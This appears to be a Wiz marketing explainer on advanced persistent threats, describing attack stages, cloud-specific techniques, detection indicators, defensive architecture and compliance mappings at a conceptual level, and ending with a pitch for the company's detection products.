What is an advanced persistent threat?
An advanced persistent threat (APT) is a prolonged, targeted cyberattack where sophisticated threat actors infiltrate your network and maintain hidden access over extended periods—sometimes months or years—to steal sensitive data, conduct espionage, or position themselves for future disruption.
Cloud Attack Retrospective: 8 Common Threats to Watch for in 2025
In this report, we examine how threat actors approached cloud environments in 2024. Drawing from detection data across thousands of organizations, we highlight eight commonly observed MITRE ATT&CK techniques and offer practical guidance on how Wiz can help to detect and mitigate them.
How APTs Differ from Other Cyber Threats
Understanding what makes APTs unique helps you prioritize defenses:
APT Campaigns
Operator model: Human-operated, adaptive
Objectives: Espionage, IP theft, strategic positioning
Dwell time: Weeks to months (varies by sophistication)
Targeting: Specific organizations or sectors
Techniques: Custom tools, living off the land, zero-days (selective)
Ransomware Attacks
Operator model: Increasingly human-operated (big game hunting)
Objectives: Immediate financial gain through extortion
Dwell time: Days to weeks before encryption
Targeting: Opportunistic or sector-focused
Techniques: Commodity tools, encryption, data theft for double extortion
Commodity Malware
Operator model: Fully automated
Objectives: Mass credential theft, cryptomining, botnet recruitment
Dwell time: Hours to days before detection
Targeting: Indiscriminate, volume-based
Techniques: Known exploits, phishing at scale, automated propagation
The key distinction is that APTs invest significant time and resources to remain undetected while achieving specific strategic objectives, whereas ransomware and commodity malware prioritize speed and volume.
Why advanced persistent threats are particularly dangerous
Attackers use legitimate administrative tools already installed on your systems to carry out their activities, making their actions look like normal IT operations. This technique, called "living off the land," means their malicious activity blends in with everyday network traffic.
The attackers also adapt their tactics based on your defenses. If they notice you've blocked one method, they'll switch to another approach. This human-driven flexibility makes them far more dangerous than automated attacks that follow predictable patterns.
APTs selectively use zero-day vulnerabilities—security flaws unknown to vendors—when targeting high-value objectives. However, most APT intrusions exploit known vulnerabilities, valid credentials, and misconfigurations rather than zero-days. Organizations like Mandiant report that credential theft and exploitation of unpatched known vulnerabilities remain the most common initial access vectors, making basic security hygiene critical alongside advanced defenses. APTs also compromise trusted third-party vendors through supply chain attacks, such as the SolarWinds attack, giving them a backdoor into your network through partners you already trust.
The APT attack lifecycle and stages
APT attacks follow a predictable sequence of stages, though the timeline can stretch across months or years. Understanding these stages helps you spot the warning signs before attackers achieve their final goal.
Stage 1: Initial Compromise
The attack starts when hackers gain their first foothold in your network. They typically use spear-phishing emails that target specific employees with personalized messages designed to trick them into clicking malicious links or opening infected attachments. Other entry points include exploiting vulnerabilities in public-facing systems like web servers or VPNs.
Stage 2: Establish a Foothold
Once inside, attackers immediately work to establish persistence. They install backdoors and remote access tools that let them return to your network even if you reboot systems or patch the original vulnerability. These tools communicate with the attacker's command and control servers using encrypted channels that look like normal internet traffic.
Stage 3: Privilege Escalation
Initial access usually gives attackers only basic user permissions. To move freely through your network, they need administrative privileges. They achieve this through privilege escalation, exploiting system vulnerabilities, cracking weak passwords, or stealing credentials from computer memory using specialized tools.
Stage 4: Lateral Movement
With elevated privileges, attackers begin exploring your network to find valuable targets. They map out your systems using tools like BloodHound (for Active Directory environments) or native cloud APIs, identify critical servers, and locate sensitive data stores. This lateral movement through your network uses techniques like pass-the-hash, pass-the-ticket, or exploiting trust relationships between cloud accounts, letting them jump from one compromised system to another while expanding their control with each step.
Stage 5: Data Exfiltration
The final stage is achieving their objective, which usually means stealing your data. Attackers gather the information they want, compress and encrypt it, then slowly transfer it out of your network in small chunks. This gradual approach helps them avoid triggering alerts that would flag large, suspicious data transfers. Attackers often compress, encrypt, and stage data for gradual exfiltration, using legitimate cloud storage services or encrypted channels to blend with normal business traffic.
What is Data Exfiltration? Techniques, Prevention, Examples
Data exfiltration is when sensitive data is accessed without authorization or stolen. Just like any data breach, it can lead to financial loss, reputational damage, and business disruptions.
Read more
Common APT attack techniques and tactics
APT actors use a diverse toolkit of techniques that evolve constantly. While specific tools change, the underlying strategies remain consistent across different attack groups.
Social Engineering and Spear Phishing
Spear phishing is a highly targeted form of email attack. Unlike generic phishing that goes to thousands of people, spear phishing emails are crafted specifically for you or your colleagues. Attackers research your company on social media and public websites to make their emails look legitimate, often impersonating executives or trusted partners.
Zero-Day Exploitation
Zero-day vulnerabilities are security flaws that software vendors don't know about yet. APTs develop exploits for these unknown vulnerabilities, allowing them to bypass even well-maintained security systems. Since no patch exists, your defenses can't stop these attacks until the vendor discovers and fixes the flaw.
Supply Chain Attacks
Supply chain attacks target your trusted vendors and partners instead of attacking you directly. By compromising a software update from a vendor you trust, attackers can distribute malware to all of that vendor's customers at once. This approach bypasses your perimeter defenses because the malicious code comes from a source you've already approved.
Living Off the Land
To avoid detection, APTs use tools that are already installed on your systems for legitimate purposes. PowerShell, Windows Management Instrumentation (WMI), and other administrative tools become 'living off the land' techniques frequently used by APTs. Since these are legitimate system utilities, security controls must focus on behavioral anomalies—such as PowerShell executing from unusual parent processes, WMI creating persistence mechanisms, or administrative tools running in user contexts—rather than blocking the tools themselves.
APT threats in cloud and containerized environments
Cloud environments create new opportunities for APT actors because of their complexity and the shared responsibility model between you and your cloud provider. The dynamic nature of cloud resources makes them harder to monitor and secure. Graph-based context across misconfigurations, identities, network exposure, and data helps surface the toxic combinations APTs exploit for lateral movement and persistence—such as an internet-exposed workload with an over-privileged role that can access sensitive data stores.
Cloud Control Plane Attacks
The cloud control plane includes the APIs and management interfaces you use to configure your cloud resources. If attackers compromise credentials with control plane access, they can create rogue resources, modify security controls (such as AWS security groups, Azure Network Security Groups, or GCP firewall rules), alter IAM policies to grant themselves additional permissions, or disable logging services (CloudTrail, Azure Activity Logs, GCP Cloud Audit Logs) to degrade visibility into their activities.
Container and Kubernetes Exploitation
Containers and Kubernetes introduce unique risks that APTs exploit. Attackers target vulnerable container images, misconfigured Kubernetes RBAC (Role-Based Access Control), overly permissive network policies, and exposed Kubernetes API servers. Compromising the Kubernetes API server or etcd (the cluster's configuration database) can grant broad cluster control, while container escape techniques allow attackers to break out of container isolation to access the underlying host system.
Serverless and Function Manipulation
Serverless computing abstracts away infrastructure management, but it doesn't eliminate security risks. Attackers can manipulate serverless functions to execute malicious code, steal data, or trigger unauthorized actions across your cloud services. The event-driven nature of serverless makes it easy for attackers to chain together multiple compromised functions.
Identity and Access Management Abuse
In cloud environments, identity becomes your primary security boundary. APTs exploit cloud identity systems through multiple techniques:
Token and Credential Theft
Stealing OAuth access tokens or refresh tokens from compromised applications
Harvesting credentials from instance metadata services (AWS EC2 IMDS, Azure IMDS)
Extracting service principal credentials from application configuration files or environment variables
Permission Abuse
Exploiting over-privileged roles with excessive permissions beyond job requirements
Leveraging unused permissions that remain attached to identities
Abusing complex trust relationships between accounts (AWS cross-account roles, Azure service principals)
Identity System Manipulation
OAuth application consent abuse to gain persistent access to user data
Creating backdoor identities or service principals for persistent access
Modifying federation configurations to establish alternative authentication paths
Exploiting OIDC (OpenID Connect) misconfigurations in CI/CD pipelines
Privilege Escalation
Chaining permissions to escalate from low-privilege to administrative access
Exploiting IAM policy misconfigurations that grant unintended permissions
Abusing assume-role or impersonation capabilities to access higher-privilege contexts
Unified CIEM (Cloud Infrastructure Entitlement Management) analysis identifies over-privileged roles, unused permissions, and risky trust relationships before attackers exploit them.
Detecting advanced persistent threats
Detecting APTs requires moving beyond traditional signature-based security to focus on behavior and anomalies. Since these attackers blend in with normal activity, you need to identify subtle deviations from expected patterns.
Behavioral Analytics
Behavioral analytics establishes a baseline of normal activity for your users, devices, and network traffic. Your security systems then watch for deviations from this baseline, such as users accessing systems they've never touched before or data transfers happening at unusual times. Agentless, unified telemetry across control plane, workloads, and identities enables reliable baselining and anomaly detection without deployment friction, ensuring complete visibility from day one rather than waiting weeks for agent rollout and baseline establishment.
Network Traffic Analysis
While APTs try to hide their command and control communications, careful analysis of network traffic can reveal their presence. Look for unusual internal traffic patterns that might indicate lateral movement, or identify data being collected on staging servers before exfiltration. Monitoring east-west traffic between internal systems is as important as north-south traffic to the internet. In cloud environments, this includes analyzing VPC Flow Logs (AWS), NSG Flow Logs (Azure), and VPC Flow Logs (GCP) to detect unusual inter-service communications, unexpected cross-account access, or data movement patterns that indicate lateral movement between compromised resources.
User and Entity Behavior Analytics
UEBA (User and Entity Behavior Analytics) solutions focus on how users, service principals, and machine identities behave. They detect compromised credentials by identifying impossible travel scenarios (logins from geographically distant locations within minutes), abnormal access patterns (users accessing systems outside their normal scope), or sudden spikes in privilege use (such as a developer account suddenly performing administrative operations).
Threat Intelligence Integration
Threat intelligence feeds provide up-to-date information about known APT groups, including their tools, techniques, and indicators of compromise. By continuously searching your environment for these indicators—such as malicious IP addresses, file hashes, or domain names—you can uncover ongoing or past APT activity that might otherwise go unnoticed.
Signs You May Have an APT in Your Environment
Watch for these indicators during threat hunting and security reviews:
Cloud Control Plane Anomalies
Unusual role assumptions or privilege escalations outside normal patterns
New IAM users, roles, or service principals created by non-administrative accounts
Modifications to logging configurations or disabled audit trails
Unexpected changes to security groups, firewall rules, or network policies
Creation of new access keys or service account credentials
Identity and Access Indicators
Impossible travel: logins from geographically distant locations within short timeframes
Service principal consents or OAuth app permissions granted outside change windows
Dormant accounts suddenly becoming active
Repeated authentication failures followed by successful login (credential stuffing)
Access to resources outside an identity's normal scope
Network and Data Movement
Unusual east-west traffic between internal systems or cloud accounts
Repeated small data transfers to external destinations (gradual exfiltration)
Connections to newly registered domains or suspicious IP addresses
Encrypted traffic to unusual destinations
Data staging on intermediate systems before external transfer
System and Workload Behavior
Security tools or agents being disabled or modified
Unexpected processes running with elevated privileges
PowerShell, WMI, or other administrative tools executing from unusual parent processes
Container escapes or privilege escalation attempts in Kubernetes
Modifications to startup scripts, scheduled tasks, or persistence mechanisms
Regular threat hunting using these indicators helps reduce dwell time and catch APTs before they achieve their objectives.
Threat hunting framework: A cloud security best practice guide
Threat hunting frameworks provide structured, repeatable methodologies for proactively searching for hidden threats that have bypassed traditional security defenses in cloud environments.
Read moreDefending against advanced persistent threats
Defending against APTs requires assuming that attackers will eventually get inside your network. Your strategy should focus on limiting what they can do once they're in and detecting them as quickly as possible.
Zero Trust Architecture
Zero Trust, as defined in NIST SP 800-207, eliminates implicit trust for users, devices, and workloads regardless of network location. The model requires continuous verification of identity and device posture, enforcement of least privilege access, and policy-based authorization for every resource request. This approach assumes breach and limits lateral movement by requiring explicit authorization at each access point rather than trusting entities once they're inside the network perimeter.
Network Segmentation
Dividing your network into smaller, isolated segments contains breaches to limited areas. If attackers compromise one segment, they can't easily jump to another without triggering additional security controls. This microsegmentation approach limits the potential damage from any single compromise.
Continuous Security Monitoring
You need around-the-clock monitoring of cloud-specific telemetry to catch APTs in action. Critical log sources include:
AWS: CloudTrail (API activity), VPC Flow Logs (network traffic), GuardDuty (threat detection), Config (configuration changes), CloudWatch Logs (application and system logs)
Azure: Activity Logs (control plane operations), NSG Flow Logs (network traffic), Microsoft Defender for Cloud (threat detection), Azure Monitor (resource logs), Azure AD sign-in logs (identity activity)
GCP: Cloud Audit Logs (admin and data access), VPC Flow Logs (network traffic), Security Command Center (threat detection), Cloud Logging (application logs), Identity and Access Management logs
Real-time analysis of these sources enables detection of control plane abuse, unusual identity behavior, and lateral movement patterns that signal APT activity.
Incident Response Planning
Having a well-defined incident response plan ensures your team knows exactly what to do when they detect an APT. This includes documented playbooks for different attack scenarios, regular practice exercises, and clear authority for the security team to quickly contain threats. Code-to-cloud traceability speeds root cause analysis and prevents recurrence by fixing the source in code or pipelines, not just patching symptoms in production—ensuring the same vulnerability doesn't reappear in the next deployment.
7 Best Incident Response Plan Templates for Security Teams
Access top incident response plan templates for your security team, find out which are cloud native, and learn how you can respond faster to minimize damage.
Read more
Mapping APT Defenses to Compliance Frameworks
APT defense capabilities satisfy multiple compliance and security framework requirements:
ISO 27001:2022
A.5.24 (Information security incident management planning)
A.8.16 (Monitoring activities)
A.12.4 (Logging and monitoring)
A.16 (Incident management)
SOC 2 Trust Services Criteria
CC7.2 (System monitoring for anomalies)
CC7.3 (Security incident evaluation and response)
CC7.4 (Incident response communication)
NIST Cybersecurity Framework
DE.AE (Anomalies and Events detection)
DE.CM (Security Continuous Monitoring)
RS.AN (Analysis of incidents)
RS.MI (Mitigation of incidents)
NIST SP 800-53 Rev. 5
AU (Audit and Accountability) family
AC (Access Control) family
IR (Incident Response) family
SI (System and Information Integrity) family
CIS Controls v8
Control 8 (Audit Log Management)
Control 13 (Network Monitoring and Defense)
Control 17 (Incident Response Management)
NIST SP 800-207 (Zero Trust Architecture)
Continuous verification and authentication
Least privilege access enforcement
Microsegmentation and network isolation
Implementing comprehensive APT defenses demonstrates due diligence and helps organizations meet multiple compliance obligations simultaneously.
Notable APT groups and real-world examples
Security researchers track numerous APT groups, categorizing them by their suspected origins, motivations, and common techniques. Understanding these profiles helps you anticipate the types of threats you're most likely to face.
Nation-State Groups
Government-sponsored APT groups typically focus on geopolitical objectives. They target government agencies, defense contractors, and critical infrastructure sectors to conduct espionage, steal state secrets, or position themselves for future disruptive operations. These groups have substantial resources and patience to achieve their long-term goals.
Financial Crime Groups
Sophisticated criminal organizations use APT tactics for large-scale financial theft. They target banks, financial institutions, and cryptocurrency exchanges with custom malware and complex schemes designed to steal millions of dollars. These groups combine technical sophistication with deep understanding of financial systems.
Cyber Espionage Operations
Corporate espionage groups focus on stealing intellectual property, trade secrets, and proprietary research. The stolen information gives their domestic industries competitive advantages in global markets. These attacks often target technology companies, pharmaceutical firms, and manufacturing organizations with valuable innovations.
Recent Campaign Analysis
APT tactics continue evolving with new technologies. Recent trends include AI-assisted social engineering for more convincing phishing, targeting cloud-native services and identity systems (such as OAuth token theft and service principal abuse), supply chain compromises for widespread impact, living-off-the-land persistence using cloud-native features, and tampering with telemetry by disabling logging services or modifying audit configurations to evade detection. The shift to remote work has also created new attack vectors through home networks and personal devices.
Wiz Defend: Runtime-powered APT detection for cloud environments
Wiz provides agentless visibility across your entire cloud environment in minutes, exposing the hidden relationships and attack paths that APTs exploit to move laterally and establish persistence. By connecting to your cloud through APIs, Wiz scans every resource without impacting performance, ensuring complete coverage and eliminating blind spots where attackers hide.
The Wiz Security Graph identifies toxic combinations of vulnerabilities, misconfigurations, and excessive permissions that create viable attack paths. By visualizing how a public-facing vulnerability could combine with an over-privileged role to access critical data, Wiz helps you proactively close these routes before APTs exploit them.
Wiz Defend combines behavioral analytics with real-time monitoring of cloud audit logs to detect APT activities across your cloud control plane. It alerts on suspicious actions like unusual role assumptions, unexpected security modifications, or attempts to disable logging. These signals help you catch attackers as they try to manipulate your cloud environment.
For workload protection, Wiz's lightweight eBPF-based sensor captures process-level activity that signals active compromise. This includes detecting malware execution, reverse shells for command and control, and container escape attempts. These runtime signals provide definitive evidence that an APT has established a foothold in your workloads.
Wiz Code prevents initial compromise by shifting security into your development lifecycle. It scans code repositories and pipelines for vulnerabilities, infrastructure misconfigurations, and exposed secrets. By catching these risks before deployment, Wiz reduces the attack surface that APTs can target for initial access.
Cloud forensics capabilities correlate events into an Investigation graph and incident timeline, accelerating scoping, blast-radius analysis, and response. By bringing together signals from the cloud control plane, workloads, and network, Wiz helps incident responders understand the full scope of an APT attack—including initial access, lateral movement paths, and data exposure—faster than traditional tools that analyze each layer in isolation.
Request a demo to see how Wiz helps organizations gain the comprehensive visibility and contextual threat detection needed to identify and disrupt sophisticated APT campaigns before they achieve their objectives.
A single platform for everything cloud security
Learn why CISOs at the fastest growing companies choose Wiz to secure their cloud environments.
